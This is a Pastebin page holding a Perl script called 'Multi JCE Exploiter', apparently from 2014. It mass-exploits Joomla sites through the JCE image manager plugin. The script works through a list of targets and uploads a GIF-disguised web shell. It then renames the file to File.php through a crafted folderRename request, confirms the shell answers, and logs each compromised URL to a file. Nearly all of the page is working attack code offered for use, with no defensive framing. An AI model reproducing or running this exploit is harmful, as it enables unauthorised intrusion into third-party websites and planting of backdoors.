Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #--------------------------------------#
- # Multi JCE Exploiter #
- #--------------------------------------#
- # C0ded By : Medrik #
- #--------------------------------------#
- # SecTime.Ir , GHBSec.blogspot.com #
- #--------------------------------------#
- # Special Thanks To : Mr.0x41 #
- #--------------------------------------#
- #----------------------------
- # Download GIF File If You Dont have that : http://setfa.net/images/ajakqsvigixdi7d24y47.gif
- # Change This GIF File Name To Medrik.gif And Insert Beside This Perl File .
- #----------------------------
- if ($^O eq 'MSWin32'){system 'cls';}else {system 'clear';}
- if (!$ARGV[0]){
- banner();
- print q(
- # usage : perl JCE.pl YourList.txt
- );
- sleep (10);
- exit;
- }
- &banner;
- sub banner{
- print "
- ,--^----------,--------,-----,-------^--,
- | ||||||||| `--------' | O
- `+---------------------------^----------|
- `\_,-------, _________________________|
- / XXXXXX /`| /
- / XXXXXX / `\ / Multi JCE Exploiter
- / XXXXXX /\______(
- / XXXXXX / Coded By Medrik
- / XXXXXX /
- (________( ./2014 , Grey Hat Boys
- ";
- }
- use LWP;
- use IO::Socket::INET;
- $myuseragent = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801';
- $ua = LWP::UserAgent->new();
- $ua->agent($myuseragent);
- $ua->timeout(15);
- print "\n";
- open (TARGETS , $ARGV[0]) or die "\n Couldn't Open ".$ARGV[0]."\n\n";
- my @file = <TARGETS>;
- target: foreach (@file){ chomp(my $target = $_);
- $exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
- $site = "http://".$target if ($target !~ /http:\/\//);
- $vulnurl=$site.$exploiturl;
- $res = $ua->get($vulnurl)->content;
- if ($res =~ m/No function call specified!/i){
- my $res = $ua->post($vulnurl,
- Content_Type => 'form-data',
- Content => [
- 'upload-overwrite' => 0,
- 'Filedata' => ["Shell.gif"],
- 'action' => 'upload'
- ]
- )->decoded_content;
- if ($res =~ m/"error":false/i){
- #---
- }else{
- print " [-] $site -> Target Patched ! \n";
- }
- }
- $remote = IO::Socket::INET->new(
- Proto=>'tcp',
- PeerAddr=>"$target",
- PeerPort=>80,
- Timeout=>15
- ) or print " Error For : $site" and next target;
- $json = 'json={"fn":"folderRename","args":["/Shell.gif","File.php"]}';
- print $remote "POST $exploiturl HTTP/1.1"."\n";
- print $remote "Host: $target"."\n";
- print $remote "User-Agent: $myuseragent"."\n";
- print $remote 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'."\n";
- print $remote 'X-Request: JSON'."\n";
- print $remote "Content-Length: ".length($json).""."\n\n";
- print $remote "$json"."\n\n";
- $addressShell = "$site/images/stories/File.php";
- $shelltarget = $ua->get($addressShell)->content;
- if ($shelltarget =~ /your file to upload/){
- print "\n [+] $addressShell \n\n";
- open (Sh3llz , ">Shell.txt");
- print Sh3llz "$addressShell\n";
- }
- }
- print "\n\n [*] Finished ! \n\n";
- sleep (3);
- #
- # hahahahhahahah End .>>>>>>> Hahahah !
- #
- # Special Tnx To Iranian Hackers And Programmers :)
- #
- # ./2014 , Grey Hat Boys
- #--------------------------------------#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement